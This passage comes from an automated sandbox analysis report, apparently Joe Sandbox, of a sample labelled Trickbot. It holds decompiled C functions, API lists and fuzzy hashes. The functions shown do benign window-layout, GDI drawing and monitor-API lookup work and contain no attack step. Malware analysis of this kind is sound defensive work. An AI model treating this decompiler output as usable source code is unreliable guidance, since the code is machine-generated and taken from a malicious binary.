                          					_v12 = _t65;
                          					if( *((intOrPtr*)(_t131 + 0x84)) == 0 || ( *(E0042BD0C(_t131, _t141) + 4) & 0x00002020) != 0) {
                          						L16:
                          						if((E0041B66F(_t131) & 0x40000000) == 0) {
                          							E0041AC18(_t131, _t126, 0);
                          						}
                          						return _v12;
                          					} else {
                          						GetWindowRect( *(_t131 + 0x1c),  &_v48);
                          						GetWindowRect(GetDlgItem( *(_t131 + 0x1c), 1),  &_v32);
                          						E0041B784(_t131, 0, 0, 0, _v48.right - _v48.left, _v32.top - _v48.top, 0x16);
                          						_t130 = 0x44739c;
                          						do {
                          							_t79 = GetDlgItem( *(_t131 + 0x1c),  *_t130);
                          							_v16 = _t79;
                          							if(_t79 != 0) {
                          								ShowWindow(_t79, 0);
                          								EnableWindow(_v16, 0);
                          							}
                          							_t130 =  &(_t130[1]);
                          						} while (_t130 < 0x4473ac);
                          						goto L16;
                          					}
                          				} else {
                          					_t82 = GetDlgItem( *(_t131 + 0x1c), 0x3020);
                          					_v12 = _t82;
                          					GetWindowRect(_t82,  &_v32);
                          					E0042147E(_t131,  &_v32);
                          					_v48.left = 0;
                          					_v48.top = 0;
                          					_v48.right = 0;
                          					_v48.bottom = 0x20;
                          					MapDialogRect( *(_t131 + 0x1c),  &_v48);
                          					_t88 = _v32.bottom;
                          					if(_v48.bottom >= _t88) {
                          						goto L10;
                          					}
                          					_v16 = _t88 - _v32.top - _v48.bottom;
                          					SetWindowPos(_v12, 0, 0, 0, _v32.right - _v32.left, _v48.bottom, 0x16);
                          					_v8 = 0x44739c;
                          					do {
                          						_t95 = GetDlgItem( *(_t131 + 0x1c),  *_v8);
                          						_v12 = _t95;
                          						if(_t95 != 0) {
                          							GetWindowRect(_t95,  &_v32);
                          							E0042147E(_t131,  &_v32);
                          							SetWindowPos(_v12, 0, _v32.left, _v32.top - _v16, 0, 0, 0x15);
                          						}
                          						_v8 =  &(_v8[1]);
                          					} while (_v8 < 0x4473ac);
                          					GetWindowRect( *(_t131 + 0x1c),  &_v32);
                          					E0041B784(_t131, 0, 0, 0, _v32.right - _v32, _v32.bottom - _v32.top - _v16, 0x16);
                          					goto L10;
                          				}
                          			}

                          APIs
                          • GetDlgItem.USER32(?,00003020), ref: 0042C392
                          • GetDlgItem.USER32(?,00003020), ref: 0042C3CB
                          • GetWindowRect.USER32(00000000,?), ref: 0042C3D9
                          • MapDialogRect.USER32(?,?), ref: 0042C3FD
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000020,00000016), ref: 0042C42A
                          • GetDlgItem.USER32(?,0044739C), ref: 0042C43F
                          • GetWindowRect.USER32(00000000,?), ref: 0042C451
                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 0042C470
                          • GetWindowRect.USER32(?,?), ref: 0042C48A
                          • GetWindowRect.USER32(?,?), ref: 0042C4D1
                          • GetDlgItem.USER32(?,00000001), ref: 0042C4D8
                          • GetWindowRect.USER32(00000000,?), ref: 0042C4E3
                          • GetDlgItem.USER32(?,0044739C), ref: 0042C509
                          • ShowWindow.USER32(00000000,00000000), ref: 0042C518
                          • EnableWindow.USER32(?,00000000), ref: 0042C522
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Rect$Item$DialogEnableShow
                          • String ID:
                          • API String ID: 763981185-3916222277
                          • Opcode ID: 97fbdb95e80f6cf2d6e4af29c1fdc7ed3e353b049a29fc6272a3ae891282bee3
                          • Instruction ID: b3bb8dee7536ab1172bfadd894a568a0c34963d4827b48d31431274bb495a4d3
                          • Opcode Fuzzy Hash: 97fbdb95e80f6cf2d6e4af29c1fdc7ed3e353b049a29fc6272a3ae891282bee3
                          • Instruction Fuzzy Hash: BD512BB1A00219AFDF11DFA5DC89DAFBBB9EF08304F50852AF501A2250DB789D45DB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0041AC18(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                          				signed int _v5;
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				struct tagRECT _v28;
                          				struct tagRECT _v44;
                          				struct tagRECT _v60;
                          				struct tagRECT _v80;
                          				char _v100;
                          				intOrPtr _t55;
                          				struct HWND__* _t56;
                          				intOrPtr _t78;
                          				intOrPtr _t90;
                          				signed int _t99;
                          				struct HWND__* _t100;
                          				struct HWND__* _t102;
                          				void* _t104;
                          				long _t110;
                          				void* _t113;
                          				struct HWND__* _t115;
                          				void* _t117;
                          				intOrPtr _t119;
                          				intOrPtr _t123;
                          
                          				_t113 = __edx;
                          				_t119 = __ecx;
                          				_v12 = __ecx;
                          				_v8 = E0041B66F(__ecx);
                          				_t55 = _a4;
                          				if(_t55 == 0) {
                          					if((_v5 & 0x00000040) == 0) {
                          						_t56 = GetWindow( *(__ecx + 0x1c), 4);
                          					} else {
                          						_t56 = GetParent( *(__ecx + 0x1c));
                          					}
                          					_t115 = _t56;
                          					if(_t115 != 0) {
                          						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
                          						if(_t100 != 0) {
                          							_t115 = _t100;
                          						}
                          					}
                          				} else {
                          					_t115 =  *(_t55 + 0x1c);
                          				}
                          				GetWindowRect( *(_t119 + 0x1c),  &_v44);
                          				if((_v5 & 0x00000040) != 0) {
                          					_t102 = GetParent( *(_t119 + 0x1c));
                          					GetClientRect(_t102,  &_v28);
                          					GetClientRect(_t115,  &_v60);
                          					MapWindowPoints(_t115, _t102,  &_v60, 2);
                          				} else {
                          					if(_t115 != 0) {
                          						_t99 = GetWindowLongA(_t115, 0xfffffff0);
                          						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
                          							_t115 = 0;
                          						}
                          					}
                          					_v100 = 0x28;
                          					if(_t115 != 0) {
                          						GetWindowRect(_t115,  &_v60);
                          						E00404366(E004042FB(_t115, 2),  &_v100);
                          						CopyRect( &_v28,  &_v80);
                          					} else {
                          						_t90 = E004041A9();
                          						if(_t90 != 0) {
                          							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
                          						}
                          						E00404366(E004042FB(_t90, 1),  &_v100);
                          						CopyRect( &_v60,  &_v80);
                          						CopyRect( &_v28,  &_v80);
                          					}
                          				}
                          				_t117 = _v44.right - _v44.left;
                          				asm("cdq");
                          				_t104 = _v44.bottom - _v44.top;
                          				asm("cdq");
                          				_t114 = _v60.bottom;
                          				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
                          				asm("cdq");
                          				asm("cdq");
                          				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
                          				if(_t110 >= _v28.left) {
                          					_t78 = _v28.right;
                          					if(_t117 + _t110 > _t78) {
                          						_t110 = _t78 - _v44.right + _v44.left;
                          					}
                          				} else {
                          					_t110 = _v28.left;
                          				}
                          				if(_t123 >= _v28.top) {
                          					if(_t104 + _t123 > _v28.bottom) {
                          						_t123 = _v44.top - _v44.bottom + _v28.bottom;
                          					}
                          				} else {
                          					_t123 = _v28.top;
                          				}
                          				return E0041B784(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
                          			}

                          APIs
                            • Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B
                          • GetParent.USER32(?), ref: 0041AC43
                          • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0041AC66
                          • GetWindowRect.USER32(?,?), ref: 0041AC7F
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0041AC92
                          • CopyRect.USER32(?,?), ref: 0041ACDF
                          • CopyRect.USER32(?,?), ref: 0041ACE9
                          • GetWindowRect.USER32(00000000,?), ref: 0041ACF2
                          • CopyRect.USER32(?,?), ref: 0041AD0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Window$Copy$Long$MessageParentSend
                          • String ID: ($@
                          • API String ID: 808654186-1311469180
                          • Opcode ID: 3fe0501b51771b3c5ef70d979313766e79cd01e565e865381a51682ce7987bf9
                          • Instruction ID: 1cae885df4c53b87d04d08a3a6792948b9a157dfe65044d88c0b125d6a81ff77
                          • Opcode Fuzzy Hash: 3fe0501b51771b3c5ef70d979313766e79cd01e565e865381a51682ce7987bf9
                          • Instruction Fuzzy Hash: 14518472A00219AFCF11DBA8DC85EEEBBB9AF44310F144126F901F3290DB78ED558B59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00436316(intOrPtr* __ecx) {
                          				void* _t19;
                          				void* _t46;
                          				void* _t64;
                          
                          				if( *(__ecx + 4) != 0) {
                          					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
                          					SelectObject( *(__ecx + 8), _t64);
                          					SelectObject( *(__ecx + 4), _t64);
                          					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
                          					SelectObject( *(__ecx + 8), _t46);
                          					SelectObject( *(__ecx + 4), _t46);
                          					E00420F93(__ecx, GetROP2( *(__ecx + 8)));
                          					E00420F37(__ecx, GetBkMode( *(__ecx + 8)));
                          					E004213CD(__ecx, GetTextAlign( *(__ecx + 8)));
                          					E00420F65(__ecx, GetPolyFillMode( *(__ecx + 8)));
                          					E00420FC1(__ecx, GetStretchBltMode( *(__ecx + 8)));
                          					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
                          					 *((intOrPtr*)( *__ecx + 0x30))();
                          					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
                          					return  *((intOrPtr*)( *__ecx + 0x2c))();
                          				}
                          				return _t19;
                          			}

                          APIs
                          • GetStockObject.GDI32(00000007), ref: 0043632E
                          • SelectObject.GDI32(00000000,00000000), ref: 0043633A
                          • SelectObject.GDI32(00000000,00000000), ref: 00436342
                          • SelectObject.GDI32(00000000,00000000), ref: 00436348
                          • GetStockObject.GDI32(00000004), ref: 0043634C
                          • SelectObject.GDI32(00000000,00000000), ref: 00436352
                          • SelectObject.GDI32(00000000,00000000), ref: 0043635A
                          • SelectObject.GDI32(00000000,00000000), ref: 00436360
                          • GetROP2.GDI32(00000000), ref: 00436365
                            • Part of subcall function 00420F93: SetROP2.GDI32(?,00000000), ref: 00420FAC
                            • Part of subcall function 00420F93: SetROP2.GDI32(?,00000000), ref: 00420FBA
                          • GetBkMode.GDI32(00000000), ref: 00436376
                            • Part of subcall function 00420F37: SetBkMode.GDI32(?,?), ref: 00420F50
                            • Part of subcall function 00420F37: SetBkMode.GDI32(?,?), ref: 00420F5E
                          • GetTextAlign.GDI32(00000000), ref: 00436387
                            • Part of subcall function 004213CD: SetTextAlign.GDI32(?,00000000), ref: 004213E8
                            • Part of subcall function 004213CD: SetTextAlign.GDI32(?,00000000), ref: 004213F6
                          • GetPolyFillMode.GDI32(00000000), ref: 00436398
                            • Part of subcall function 00420F65: SetPolyFillMode.GDI32(?,?), ref: 00420F7E
                            • Part of subcall function 00420F65: SetPolyFillMode.GDI32(?,?), ref: 00420F8C
                          • GetStretchBltMode.GDI32(00000000), ref: 004363A9
                            • Part of subcall function 00420FC1: SetStretchBltMode.GDI32(?,?), ref: 00420FDA
                            • Part of subcall function 00420FC1: SetStretchBltMode.GDI32(?,?), ref: 00420FE8
                          • GetTextColor.GDI32(00000000), ref: 004363BA
                          • GetNearestColor.GDI32(00000000,00000000), ref: 004363CA
                          • GetBkColor.GDI32(00000000), ref: 004363D7
                          • GetNearestColor.GDI32(00000000,00000000), ref: 004363E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
                          • String ID:
                          • API String ID: 1751264856-0
                          • Opcode ID: 45db5bcce57a4e8f27ed5c0a934facf34518a3714622b05897452d4914f875ef
                          • Instruction ID: e58643aa5b055f3f55d70e15a400ecf6f825e4c44caec3be679e9c0ac1170a3c
                          • Opcode Fuzzy Hash: 45db5bcce57a4e8f27ed5c0a934facf34518a3714622b05897452d4914f875ef
                          • Instruction Fuzzy Hash: F6216071200516BFDB217B66DC48D2BBBEEFF883007018429F15A91531CBA2AC52DF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E004347AC(intOrPtr* __ecx) {
                          				void* __ebx;
                          				void* __edi;
                          				void* _t171;
                          				struct HDC__* _t188;
                          				intOrPtr* _t192;
                          				intOrPtr _t203;
                          				struct HBRUSH__* _t239;
                          				intOrPtr* _t244;
                          				signed int* _t276;
                          				intOrPtr* _t281;
                          				intOrPtr _t301;
                          				intOrPtr _t317;
                          				intOrPtr* _t339;
                          				intOrPtr _t342;
                          				intOrPtr _t343;
                          				int* _t351;
                          				intOrPtr* _t352;
                          				int _t353;
                          				void* _t355;
                          
                          				_t171 = E00405340(E00437C00, _t355);
                          				_t281 = __ecx;
                          				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                          					L22:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
                          					return _t171;
                          				} else {
                          					_t339 =  *((intOrPtr*)(_t355 + 8));
                          					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
                          					 *((intOrPtr*)(_t355 - 0x38)) = 0;
                          					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
                          					 *(_t355 - 0x28) =  *(_t355 - 0x20);
                          					 *((intOrPtr*)(_t355 - 0x3c)) = 0x43b57c;
                          					 *(_t355 - 4) = 0;
                          					E0042179E(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
                          					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
                          					 *((intOrPtr*)(_t355 - 0x34)) = 0x43b57c;
                          					 *(_t355 - 4) = 1;
                          					E0042179E(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
                          					 *((intOrPtr*)(_t355 - 0x10)) = 0;
                          					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
                          					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
                          						L21:
                          						E004217F5(_t355 - 0x3c);
                          						E004217F5(_t355 - 0x34);
                          						 *((intOrPtr*)(_t355 - 0x34)) = 0x43aed4;
                          						 *(_t355 - 4) = 2;
                          						E004217F5(_t355 - 0x34);
                          						 *((intOrPtr*)(_t355 - 0x3c)) = 0x43aed4;
                          						 *(_t355 - 4) = 3;
                          						_t171 = E004217F5(_t355 - 0x3c);
                          						goto L22;
                          					} else {
                          						 *((intOrPtr*)(_t355 - 0x14)) = 0;
                          						while(1) {
                          							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
                          							if(_t339 != 0) {
                          								_t188 =  *(_t339 + 4);
                          							} else {
                          								_t188 = 0;
                          							}
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
                          							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
                          							_t192 =  *((intOrPtr*)(_t281 + 0x114));
                          							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
                          								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
                          							}
                          							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
                          							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
                          							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
                          							 *((intOrPtr*)( *_t339 + 0x1c))();
                          							_t203 =  *((intOrPtr*)(_t281 + 0x90));
                          							_t301 =  *((intOrPtr*)(_t355 - 0x14));
                          							_t351 = _t301 + _t203;
                          							 *(_t355 - 0x1c) = _t351;
                          							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
                          								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
                          								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
                          									_t276 = E0041FEE4(_t281, _t355 - 0x44);
                          									 *(_t355 - 0x2c) =  ~( *_t276);
                          									 *(_t355 - 0x28) =  ~(_t276[1]);
                          								}
                          							}
                          							 *((intOrPtr*)( *_t339 + 0x34))(1);
                          							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
                          							E00421188(_t339, _t355 - 0x54, 0, 0);
                          							 *((intOrPtr*)( *_t339 + 0x24))(5);
                          							E00420EC2(_t339, _t355 - 0x3c);
                          							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
                          							E00420EC2(_t339, _t355 - 0x34);
                          							E0042134C(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
                          							E00421398(_t339, _t351[2] + 1, _t351[3] + 1);
                          							E0042134C(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
                          							E00421398(_t339, _t351[2] + 1, _t351[3] + 1);
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
                          							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
                          							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
                          							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
                          							_t239 = GetStockObject(0);
                          							_t352 =  *((intOrPtr*)(_t355 + 8));
                          							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
                          							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
                          							_t244 =  *((intOrPtr*)(_t281 + 0x114));
                          							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
                          								break;
                          							}
                          							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
                          							_t342 =  *((intOrPtr*)(_t355 - 0x10));
                          							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
                          								L18:
                          								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
                          								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
                          								if(_t342 == 0) {
                          									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
                          									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
                          										E00434FEB(_t281, _t249 - 1, 1);
                          									}
                          								}
                          								goto L21;
                          							}
                          							_t343 = _t342 + 1;
                          							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
                          							_t353 =  *(_t355 - 0x1c);
                          							E00436259(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
                          							E00436FD2( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
                          							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
                          							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
                          							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
                          							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
                          							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
                          							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
                          							E00436F3A( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
                          							E00436F50( *((intOrPtr*)(_t281 + 0x74)));
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
                          							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
                          							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
                          							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
                          							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
                          								_t339 =  *((intOrPtr*)(_t355 + 8));
                          								continue;
                          							}
                          							goto L21;
                          						}
                          						_t342 =  *((intOrPtr*)(_t355 - 0x10));
                          						goto L18;
                          					}
                          				}
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 004347B1
                          • GetViewportOrgEx.GDI32(?,?), ref: 004347DC
                          • GetSysColor.USER32(00000006), ref: 00434803
                          • CreatePen.GDI32(00000000,00000002,00000000), ref: 0043480A
                          • GetSysColor.USER32(00000010), ref: 0043482A
                          • CreatePen.GDI32(00000000,00000003,00000000), ref: 00434832
                          • GetDeviceCaps.GDI32(?,0000000A), ref: 004348D0
                          • GetDeviceCaps.GDI32(?,00000008), ref: 004348DD
                          • SetRect.USER32(?,00000000,00000000,00000000,?), ref: 004348F1
                          • DPtoLP.GDI32(?,?,00000002), ref: 00434909
                          • Rectangle.GDI32(00000001,762C6F7F,?,?,?), ref: 004349A7
                            • Part of subcall function 00420EC2: SelectObject.GDI32(?,00000000), ref: 00420EE4
                            • Part of subcall function 00420EC2: SelectObject.GDI32(?,?), ref: 00420EFA
                            • Part of subcall function 0042134C: MoveToEx.GDI32(?,?,?,?), ref: 0042136E
                            • Part of subcall function 0042134C: MoveToEx.GDI32(?,?,?,?), ref: 00421382
                            • Part of subcall function 00421398: MoveToEx.GDI32(?,FFFFFFDD,FFFFFFDD,00000000), ref: 004213B2
                            • Part of subcall function 00421398: LineTo.GDI32(?,?,?), ref: 004213C3
                          • GetStockObject.GDI32(00000000), ref: 00434A1E
                          • FillRect.USER32(00000001,00000000,00000000), ref: 00434A2F
                            • Part of subcall function 00436FD2: GetViewportExtEx.GDI32(?,?), ref: 00436FE3
                            • Part of subcall function 00436FD2: GetWindowExtEx.GDI32(?,?), ref: 00436FF0
                            • Part of subcall function 00436F50: GetDeviceCaps.GDI32(?,0000000A), ref: 00436F65
                            • Part of subcall function 00436F50: GetDeviceCaps.GDI32(?,00000008), ref: 00436F6E
                            • Part of subcall function 00436F50: SetMapMode.GDI32(?,00000001), ref: 00436F86
                            • Part of subcall function 00436F50: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 00436F94
                            • Part of subcall function 00436F50: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00436FA4
                            • Part of subcall function 00436F50: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 00436FBF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
                          • String ID: (
                          • API String ID: 14264375-3887548279
                          • Opcode ID: c7e7136b6b855bdcbabe53c65492728368ae253f506ad2948fdf6b6408d847a0
                          • Instruction ID: d0d2d81288cd27617258977501e7ef2079da390d0cf35e44c9702eceb349eb62
                          • Opcode Fuzzy Hash: c7e7136b6b855bdcbabe53c65492728368ae253f506ad2948fdf6b6408d847a0
                          • Instruction Fuzzy Hash: 7FD12874A00209DFDB14DFA4C985FAEBBB5FF48304F10416AE916AB262CB75AD41CF64
                          Uniqueness
                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004041CD() {
                          				_Unknown_base(*)()* _t5;
                          				_Unknown_base(*)()* _t6;
                          				_Unknown_base(*)()* _t7;
                          				_Unknown_base(*)()* _t8;
                          				_Unknown_base(*)()* _t9;
                          				_Unknown_base(*)()* _t10;
                          				intOrPtr _t11;
                          				struct HINSTANCE__* _t15;
                          				intOrPtr _t17;
                          				_Unknown_base(*)()* _t18;
                          
                          				_t17 =  *0x44b0d8; // 0x0
                          				if(_t17 == 0) {
                          					_t15 = GetModuleHandleA("USER32");
                          					if(_t15 == 0) {
                          						L10:
                          						 *0x44b0c0 = 0;
                          						 *0x44b0c4 = 0;
                          						 *0x44b0c8 = 0;
                          						 *0x44b0cc = 0;
                          						 *0x44b0d0 = 0;
                          						 *0x44b0d4 = 0;
                          						 *0x44b0d8 = 1;
                          						return 0;
                          					}
                          					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
                          					 *0x44b0c0 = _t5;
                          					if(_t5 == 0) {
                          						goto L10;
                          					}
                          					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
                          					 *0x44b0c4 = _t6;
                          					if(_t6 == 0) {
                          						goto L10;
                          					}
                          					_t7 = GetProcAddress(_t15, "MonitorFromRect");
                          					 *0x44b0c8 = _t7;
                          					if(_t7 == 0) {
                          						goto L10;
                          					}
                          					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
                          					 *0x44b0cc = _t8;
                          					if(_t8 == 0) {
                          						goto L10;
                          					}
                          					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
                          					 *0x44b0d4 = _t9;
                          					if(_t9 == 0) {
                          						goto L10;
                          					}
                          					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
                          					 *0x44b0d0 = _t10;
                          					if(_t10 == 0) {
                          						goto L10;
                          					}
                          					_t11 = 1;
                          					 *0x44b0d8 = _t11;
                          					return _t11;
                          				}
                          				_t18 =  *0x44b0d0; // 0x0
                          				return 0 | _t18 != 0x00000000;
                          			}

                          APIs
                          • GetModuleHandleA.KERNEL32(USER32,?,?,?,00404306), ref: 004041EF
                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,00404306), ref: 00404207
                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,00404306), ref: 00404218
                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,00404306), ref: 00404229
                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,00404306), ref: 0040423A
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,00404306), ref: 0040424B
                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,00404306), ref: 0040425C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
